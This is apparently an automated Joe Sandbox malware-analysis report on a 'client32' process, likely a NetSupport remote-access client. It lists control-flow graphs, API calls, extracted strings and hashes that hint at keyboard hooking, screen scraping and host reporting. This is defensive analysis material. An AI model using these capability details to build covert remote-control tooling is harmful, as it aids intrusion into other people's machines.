                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Message$Process$CloseWindow$HandleOpenPost$CriticalSectionThreadVersionwsprintf$CreateCurrentCursorDestroyEventFindIconInitializeLoadPeekToken_memset$ClassDispatchEnterErrorExitLastMetricsObjectPrioritySendSingleSleepSystemWait__wcstoi64_malloc_strncpy
                                                        • String ID: *BeepSound$*BeepUsingSpeaker$*PriorityClass$*ScreenScrape$*StartupDelay$494126$AlwaysOnTop$AssertTimeout$Audio$Bridge$CLIENT32.CPP$CabinetWClass$Client$Default$DisableAudio$DisableAudioFilter$DisableConsoleClient$DisableHelp$DisableJoinClass$DisableJournal$DisableJournalMenu$DisableReplayMenu$DisableRequestHelp$DisableRunplugin$DisableTSAdmin$EnableGradientCaptions$EnableSmartcardAuth$EnableSmartcardLogon$Error x%x reading nsm.lic, sesh=%d$Error. Could not load transports - perhaps another client is running$Error. Wrong hardware. Terminating$Found new explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$Found old explorer hwnd=x%x h=%d,w=%d,style=x%x (%s)$General$Global\NSMWClassAdmin$Info. Client already running, pid=%d (x%x)$Info. Client running as user=%s, type=%d$Info. Trying to close client$Intel error "%s"$IsILS returned %d, isvistaservice %d$License Control Internal Error$MiniDumpType$NSA.LIC$NSM.LIC$NSMWClass$NSMWClassVista$NSMWControl32$NSSWControl32$NSTWControl32$NoFTWhenLoggedOff$OS2$Ready$RestartAfterError$ScreenScrape$Session shutting down, exiting...$ShowKBEnable$TraceIPC$TracePriv$UseIPC$UseLegacyPrintCapture$V11.41.3$V12.01.3$View$Windows 2000$Windows 2003$Windows 2003 x64$Windows 2008$Windows 2008 x64$Windows 2012$Windows 2012 R2$Windows 7$Windows 7 x64$Windows 8$Windows 8 x64$Windows 8.1$Windows 8.1 x64$Windows 95$Windows 98$Windows CE$Windows Ding.wav$Windows Millennium$Windows NT$Windows Vista$Windows Vista x64$Windows XP$Windows XP Ding.wav$Windows XP x64$\Explorer.exe$_debug$_debug$cl32main$client32$closed ok$gClient.hNotifyEvent$hClientRunning = %x, pid=%d (x%x)$istaService$istaUI$pcicl32$win8ui
                                                        • API String ID: 4073474852-168708017
                                                        • Opcode ID: 7d63a2f86f363bdc8f7d980eb446afbe20efb3e3794d17a61fc403d34e28377a
                                                        • Instruction ID: 75a99128c0b90555870f3e8937819581192e292699187335c5c1593c45ddfd72
                                                        • Opcode Fuzzy Hash: 7d63a2f86f363bdc8f7d980eb446afbe20efb3e3794d17a61fc403d34e28377a
                                                        • Instruction Fuzzy Hash: EEE2D174E41261AFEB11DB64DCC8F9EF7A5AB4930CF5081A9ED18A7384EB706D40CB61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1265 1102c2a0-1102c2f0 call 11102870 1268 1102c2f2-1102c306 call 11131ea0 1265->1268 1269 1102c308 1265->1269 1271 1102c30e-1102c353 call 11131740 call 11131f10 1268->1271 1269->1271 1277 1102c4f3-1102c502 call 11134180 1271->1277 1278 1102c359 1271->1278 1287 1102c508-1102c518 1277->1287 1280 1102c360-1102c363 1278->1280 1281 1102c365-1102c367 1280->1281 1282 1102c388-1102c391 1280->1282 1284 1102c370-1102c381 1281->1284 1285 1102c397-1102c39e 1282->1285 1286 1102c4c4-1102c4dd call 11131f10 1282->1286 1284->1284 1288 1102c383 1284->1288 1285->1286 1290 1102c493-1102c4a8 call 11151867 1285->1290 1291 1102c3a5-1102c3a7 1285->1291 1292 1102c4aa-1102c4bf call 11151867 1285->1292 1293 1102c43a-1102c46d call 11150341 call 11131740 1285->1293 1294 1102c47b-1102c491 call 111524f0 1285->1294 1295 1102c42b-1102c435 1285->1295 1296 1102c46f-1102c479 1285->1296 1297 1102c3ec-1102c3f2 1285->1297 1298 1102c41c-1102c426 1285->1298 1286->1280 1312 1102c4e3-1102c4e5 1286->1312 1299 1102c51a 1287->1299 1300 1102c51f-1102c533 call 1102b5c0 1287->1300 1288->1286 1290->1286 1291->1286 1307 1102c3ad-1102c3e7 call 11150341 call 11131740 call 1102b5c0 1291->1307 1292->1286 1293->1286 1294->1286 1295->1286 1296->1286 1308 1102c3f4-1102c408 call 11151867 1297->1308 1309 1102c40d-1102c417 1297->1309 1298->1286 1299->1300 1316 1102c538-1102c53d 1300->1316 1307->1286 1308->1286 1309->1286 1318 1102c5e3-1102c5fd call 11135660 1312->1318 1319 1102c4eb-1102c4f1 1312->1319 1316->1318 1321 1102c543-1102c568 call 110ae410 call 111356e0 1316->1321 1332 1102c653-1102c65f call 11029eb0 1318->1332 1333 1102c5ff-1102c618 call 11059580 1318->1333 1319->1277 1319->1287 1341 1102c573-1102c579 1321->1341 1342 1102c56a-1102c571 1321->1342 1344 1102c661-1102c668 1332->1344 1345 1102c638-1102c63f 1332->1345 1333->1332 1348 1102c61a-1102c62c 1333->1348 1346 1102c57b-1102c582 call 11026a90 1341->1346 1347 1102c5d9 1341->1347 1342->1318 1349 1102c645-1102c648 1344->1349 1350 1102c66a-1102c674 1344->1350 1345->1349 1352 1102c815-1102c836 GetComputerNameA 1345->1352 1346->1347 1363 1102c584-1102c5b6 1346->1363 1347->1318 1348->1332 1364 1102c62e 1348->1364 1353 1102c64a-1102c651 call 110ae410 1349->1353 1354 1102c679 1349->1354 1350->1352 1355 1102c838-1102c86c call 11026950 1352->1355 1356 1102c86e-1102c874 1352->1356 1360 1102c67c-1102c750 call 11026600 call 11026900 call 11026600 * 2 LoadLibraryA GetProcAddress 1353->1360 1354->1360 1355->1356 1384 1102c8c2-1102c8ce 1355->1384 1361 1102c876-1102c87b 1356->1361 1362 1102c8aa-1102c8bd call 111524f0 1356->1362 1413 1102c756-1102c76d 1360->1413 1414 1102c7e5-1102c7ed SetLastError 1360->1414 1368 1102c881-1102c885 1361->1368 1383 1102cab7-1102cada 1362->1383 1380 1102c5c0-1102c5cf call 110eaeb0 1363->1380 1381 1102c5b8-1102c5be 1363->1381 1364->1345 1372 1102c8a1-1102c8a3 1368->1372 1373 1102c887-1102c889 1368->1373 1382 1102c8a6-1102c8a8 1372->1382 1378 1102c88b-1102c891 1373->1378 1379 1102c89d-1102c89f 1373->1379 1378->1372 1386 1102c893-1102c89b 1378->1386 1379->1382 1387 1102c5d2-1102c5d4 call 1102bb50 1380->1387 1381->1380 1381->1387 1382->1362 1382->1384 1395 1102cb02-1102cb0a 1383->1395 1396 1102cadc-1102cae2 1383->1396 1393 1102c8d0-1102c8e5 call 110ae410 call 11028730 1384->1393 1394 1102c8e7-1102c8fa call 1107c3b0 1384->1394 1386->1368 1386->1379 1387->1347 1419 1102c943-1102c95c call 1107c3b0 1393->1419 1409 1102c921-1102c923 1394->1409 1410 1102c8fc-1102c91f 1394->1410 1403 1102cb1c-1102cba8 call 11150341 * 2 call 111356e0 * 2 GetCurrentProcessId call 110e2d70 call 110269b0 call 111356e0 call 11150781 1395->1403 1404 1102cb0c-1102cb19 call 11131f00 call 11150341 1395->1404 1396->1395 1401 1102cae4-1102cafd call 1102bb50 1396->1401 1401->1395 1404->1403 1418 1102c930-1102c941 1409->1418 1410->1419 1423 1102c7ae-1102c7ba 1413->1423 1436 1102c76f-1102c778 1413->1436 1414->1423 1418->1418 1418->1419 1437 1102c962-1102c9dd call 111356e0 call 110c4d10 call 110c6530 call 110ae410 wsprintfA call 110ae410 wsprintfA 1419->1437 1438 1102ca9c-1102caa9 call 111524f0 1419->1438 1428 1102c7bc-1102c7c8 1423->1428 1429 1102c7fd-1102c80c 1423->1429 1433 1102c7da-1102c7de 1428->1433 1434 1102c7ca-1102c7d8 GetProcAddress 1428->1434 1429->1352 1435 1102c80e-1102c80f FreeLibrary 1429->1435 1441 1102c7e0-1102c7e3 1433->1441 1442 1102c7ef-1102c7f1 SetLastError 1433->1442 1434->1433 1435->1352 1436->1423 1440 1102c77a-1102c792 call 1111cad0 1436->1440 1473 1102c9f3-1102ca09 call 1111a8e0 1437->1473 1474 1102c9df-1102c9ee call 11027fb0 1437->1474 1456 1102caac-1102cab1 CharUpperA 1438->1456 1440->1423 1453 1102c794-1102c7a9 call 11026640 1440->1453 1447 1102c7f7 1441->1447 1442->1447 1447->1429 1453->1423 1456->1383 1478 1102ca22-1102ca5c call 110c5c80 * 2 1473->1478 1479 1102ca0b-1102ca1d call 110c5c80 1473->1479 1474->1473 1486 1102ca72-1102ca9a call 111524f0 call 110c5870 1478->1486 1487 1102ca5e-1102ca6d call 11027fb0 1478->1487 1479->1478 1486->1456 1487->1486
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: _malloc_memsetwsprintf
                                                        • String ID: $$session$$%02d$%s.%02d$%session%$%sessionname%$18/03/14 09:15:42 V12.01F3$494126$Client$ClientName$DisableConsoleClient$Error x%x reading %s, sesh=%d$IsA()$ListenPort$MacAddress$NSM.LIC$NSMWClass$TCPIP$TSMode$WTSFreeMemory$WTSQuerySessionInformationA$Warning: Unexpanded clientname=<%s>$Wtsapi32.dll$client32$client32 dbi %hs$client32.ini$computername=%s, clientname=%s, tsmode=%d, vui=%d, vsvc=%d$e:\nsmsrc\nsm\1201\1201f2\ctl32\NSMString.h$multipoint=%d, softxpand=%d, pid=%d$screenscrape
                                                        • API String ID: 3802068140-2798778214
                                                        • Opcode ID: 40ab1cae0201a3aeec5452140a15d371d84d6b28c0bec86021d57b66dd7050fb
                                                        • Instruction ID: 1eedb420cbd5dfcbbda3fd0d1686de8f37d34dfb32158dca5f9b22f0844981e9
                                                        • Opcode Fuzzy Hash: 40ab1cae0201a3aeec5452140a15d371d84d6b28c0bec86021d57b66dd7050fb
                                                        • Instruction Fuzzy Hash: 1232D575D002659FDB11DF94CD84BEEB7B9AB44308F8485E9E918A7280EB706B84CF61

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1913 6c812380-6c8123c2 call 6c81f9b0 call 6c812200 1917 6c8123c7-6c8123cf 1913->1917 1918 6c8123d1-6c8123eb call 6c820641 1917->1918 1919 6c8123ec-6c8123ee 1917->1919 1921 6c8123f0-6c812404 call 6c805910 1919->1921 1922 6c812407-6c812421 call 6c8078f0 1919->1922 1921->1922 1928 6c812423-6c812444 call 6c804e80 call 6c820641 1922->1928 1929 6c812445-6c8124c4 call 6c804950 * 2 call 6c8161a0 call 6c8048e0 lstrlenA 1922->1929 1942 6c8124c6-6c812515 call 6c81bf20 call 6c803b60 call 6c803280 call 6c81f95f 1929->1942 1943 6c812518-6c81263e call 6c804000 call 6c804b10 call 6c816230 * 2 call 6c8162c0 * 3 call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8162c0 gethostname call 6c8162c0 call 6c809ea0 1929->1943 1942->1943 1978 6c812640 1943->1978 1979 6c812645-6c812661 call 6c8162c0 1943->1979 1978->1979 1982 6c812663-6c812675 call 6c8162c0 1979->1982 1983 6c812678-6c81267e 1979->1983 1982->1983 1985 6c8128c0-6c812908 call 6c816120 call 6c81f95f call 6c808270 call 6c815da0 1983->1985 1986 6c812684-6c8126a2 call 6c8048e0 1983->1986 2014 6c812937-6c81294f call 6c820641 1985->2014 2015 6c81290a-6c812936 call 6c808c00 call 6c820641 1985->2015 1993 6c8126a4-6c8126d7 call 6c803b60 call 6c8162c0 call 6c81f95f 1986->1993 1994 6c8126da-6c812704 call 6c8048e0 1986->1994 1993->1994 2002 6c812851-6c8128bd call 6c8162c0 call 6c8048e0 call 6c8162c0 call 6c8048e0 call 6c8162c0 1994->2002 2003 6c81270a-6c81284e call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8048e0 call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8048e0 call 6c803b60 call 6c8162c0 call 6c81f95f call 6c8048e0 call 6c803b60 call 6c8162c0 call 6c81f95f 1994->2003 2002->1985 2003->2002
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                        • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: _memset
                                                        • String ID: *Dept$*ER$*Gsk$1.1$494126$A1=%s$A2=%s$A3=%s$A4=%s$APPTYPE=%d$CHATID$CHATID=%s$CLIENT_ADDR=%s$CLIENT_NAME=%s$CLIENT_VERSION=1.0$CMD=OPEN$CMPI=%u$DEPT=%s$ER=%s$GSK=%s$HOSTNAME=%s$ListenPort$MAXPACKET=%d$PORT=%d$PROTOCOL_VER=%u.%u$Port$TCPIP$client247$connection_index == 0$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c
                                                        • API String ID: 2102423945-3098530097
                                                        • Opcode ID: 031b0b13ae9a54065355bca3b95f9dc4946f54c13ece6cab5b4a8a0e4ba8a3be
                                                        • Instruction ID: eecdcd59b7ba812e24aecc33d7c0d4c098be75a7c2b8205350224315e7edacb6
                                                        • Opcode Fuzzy Hash: 031b0b13ae9a54065355bca3b95f9dc4946f54c13ece6cab5b4a8a0e4ba8a3be
                                                        • Instruction Fuzzy Hash: E0E199729002286BCB30DB649D80EEF7778AF59319F004DE9E509A7A41EB745B8CDF90

                                                        Control-flow Graph

                                                        control_flow_graph: function beginning at 111329c0 (graph image and node/edge listing omitted)
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,771B23A0), ref: 111329F3
                                                        • LoadLibraryA.KERNEL32(?), ref: 11132A3C
                                                        • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11132A55
                                                        • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11132A64
                                                        • GetModuleHandleA.KERNEL32(?), ref: 11132A6A
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 11132A7E
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 11132A9D
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11132AA8
                                                        • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11132AB3
                                                        • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 11132ABE
                                                        • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11132AC9
                                                        • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11132AD4
                                                        • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 11132ADF
                                                        • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 11132AEA
                                                        • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 11132AF5
                                                        • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 11132B00
                                                        • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 11132B0B
                                                        • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 11132B16
                                                        • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 11132B21
                                                        • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 11132B2C
                                                          • Part of subcall function 1107C480: _strrchr.LIBCMT ref: 1107C48E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                        • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                        • API String ID: 3874234733-2061581830
                                                        • Opcode ID: 11dbdab2167a41d006a5ed8c47bb96ee5bc3ae62b79fc54799e77c40f532fad6
                                                        • Instruction ID: a998bf938f72bd3d62f1ab24a8fee8fc38cc82ed36c591295b0484b214843149
                                                        • Opcode Fuzzy Hash: 11dbdab2167a41d006a5ed8c47bb96ee5bc3ae62b79fc54799e77c40f532fad6
                                                        • Instruction Fuzzy Hash: D8419275A00B54AFD7209F769C84AABFBF8FF95614B00492EE546D3A10E771EE00CB54

                                                        Control-flow Graph

                                                        control_flow_graph: function beginning at 111308e0 (graph image and node/edge listing omitted)
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(User32.dll,Client,DisableDPIAware,00000000,00000000,00000000,00000000), ref: 11130951
                                                        • GetProcAddress.KERNEL32(00000000,SetProcessDPIAware), ref: 1113098C
                                                        • SetLastError.KERNEL32(00000078), ref: 1113099F
                                                        • FreeLibrary.KERNEL32(00000000), ref: 111309B1
                                                        • LoadLibraryA.KERNEL32(imm32,?,?,00000000,00000000), ref: 111309D4
                                                        • GetClassInfoExA.USER32(11000000,NSMWClass,?), ref: 11130A39
                                                        • _memset.LIBCMT ref: 11130A4D
                                                        • LoadCursorA.USER32(00000000,00007F00), ref: 11130A9D
                                                        • GetStockObject.GDI32(00000000), ref: 11130AA7
                                                        • LoadLibraryA.KERNEL32(pcihooks,?,?,00000000,00000000), ref: 11130B51
                                                        • GetProcAddress.KERNEL32(00000000,HookKeyboard), ref: 11130B66
                                                        • RegisterClassExA.USER32(?), ref: 11130ABE
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • SetTimer.USER32(00000000,00000000,000003E8,1112CAF0), ref: 11130C7C
                                                        • #17.COMCTL32(?,?,?,00000000,00000000), ref: 11130CAA
                                                        • LoadLibraryA.KERNEL32(riched32.dll,?,?,?,00000000,00000000), ref: 11130CB5
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$AddressClassProc$CursorErrorFreeInfoLastObjectRegisterStockTimer__wcstoi64_memset
                                                        • String ID: *quiet$Client$DisableDPIAware$HookKeyboard$InitUI (%d)$Inited VolumeControl.$Initing VolumeControl...$NSMGetAppIcon()$NSMWClass$SetProcessDPIAware$TraceCopyData$UI.CPP$User32.dll$View$_License$_debug$imm32$pcihooks$riched32.dll
                                                        • API String ID: 2794364348-1986316466
                                                        • Opcode ID: 515253d7f1545cb5aae5051ee3a7f6a71433c7a55e90cf05d6b349b9ad956a9d
                                                        • Instruction ID: aa8012bde1adae0a2c02f567617443f2e4728d78ef366c72babd61b7604c4b4a
                                                        • Opcode Fuzzy Hash: 515253d7f1545cb5aae5051ee3a7f6a71433c7a55e90cf05d6b349b9ad956a9d
                                                        • Instruction Fuzzy Hash: FAB1AFB8D12266EFDB00DFA5CDC8A9EFBB4BB8431DB10453DE91997248EB305900CB51

                                                        Control-flow Graph

                                                        control_flow_graph: function beginning at 110a1f30 (graph image and node/edge listing omitted)
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(setupapi.dll,82E0FB89,?,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,11172BD8), ref: 110A1F63
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetClassDevsA), ref: 110A1F87
                                                        • SetupDiGetClassDevsA.SETUPAPI(11194154,00000000,00000000,00000012,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF), ref: 110A1FA1
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiEnumDeviceInterfaces), ref: 110A1FCC
                                                        • _free.LIBCMT ref: 110A2000
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A2012
                                                        • GetLastError.KERNEL32 ref: 110A203D
                                                        • _malloc.LIBCMT ref: 110A2053
                                                        • GetProcAddress.KERNEL32(00000000,SetupDiGetDeviceInterfaceDetailA), ref: 110A2075
                                                        • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF,?,1102D836,Client), ref: 110A20A7
                                                        • SetLastError.KERNEL32(00000078), ref: 110A20BB
                                                        • GetLastError.KERNEL32 ref: 110A20C1
                                                        • _free.LIBCMT ref: 110A20D3
                                                        • SetLastError.KERNEL32(00000078), ref: 110A20E4
                                                        • SetLastError.KERNEL32(00000078), ref: 110A20F1
                                                        • _free.LIBCMT ref: 110A2104
                                                        • FreeLibrary.KERNEL32(?,?), ref: 110A2114
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00000000,11172BD8,000000FF,?,1102D836,Client), ref: 110A21B8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ErrorLast$AddressProc$Library_free$Free$ClassDevsLoadSetup_malloc
                                                        • String ID: SetupDiDestroyDeviceInfoList$SetupDiEnumDeviceInterfaces$SetupDiGetClassDevsA$SetupDiGetDeviceInterfaceDetailA$setupapi.dll
                                                        • API String ID: 3464732724-3340099623
                                                        • Opcode ID: 4cc9fdceffce41f4bb1e2a7a350048addaa331d0d16544aed3769fc1ff043338
                                                        • Instruction ID: dee8c5d27a7d1561559e6d59ec9b4eaefc10bb237f0b189c7ffb99ba61846665
                                                        • Opcode Fuzzy Hash: 4cc9fdceffce41f4bb1e2a7a350048addaa331d0d16544aed3769fc1ff043338
                                                        • Instruction Fuzzy Hash: 578196B5E40229AFD701DFE5ED84FDEBBB9AF55744F044134F912A6280DB74A501CB60

                                                        Control-flow Graph

                                                        control_flow_graph: function beginning at 111251e0 (graph image and node/edge listing omitted)
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                        • LoadLibraryA.KERNEL32(psapi.dll,_debug,CheckLeaks,00000001,00000000,82E0FB89), ref: 11125275
                                                          • Part of subcall function 110098C0: LoadLibraryA.KERNEL32(Kernel32.dll,771B0BD0,111252A0), ref: 110098C8
                                                        • LoadLibraryA.KERNEL32(User32.dll), ref: 111252A5
                                                        • GetCurrentProcess.KERNEL32 ref: 111252FE
                                                        • GetProcAddress.KERNEL32(?,GetProcessHandleCount), ref: 11125326
                                                        • GetProcessHandleCount.KERNEL32(?,?), ref: 1112533A
                                                        • SetLastError.KERNEL32(00000078), ref: 11125340
                                                        • GetProcAddress.KERNEL32(00000000,GetGuiResources), ref: 1112534C
                                                        • SetLastError.KERNEL32(00000078), ref: 11125373
                                                        • GetProcAddress.KERNEL32(?,GetGuiResources), ref: 11125388
                                                        • SetLastError.KERNEL32(00000078), ref: 111253A5
                                                        • GetProcAddress.KERNEL32(?,GetProcessMemoryInfo), ref: 111253B7
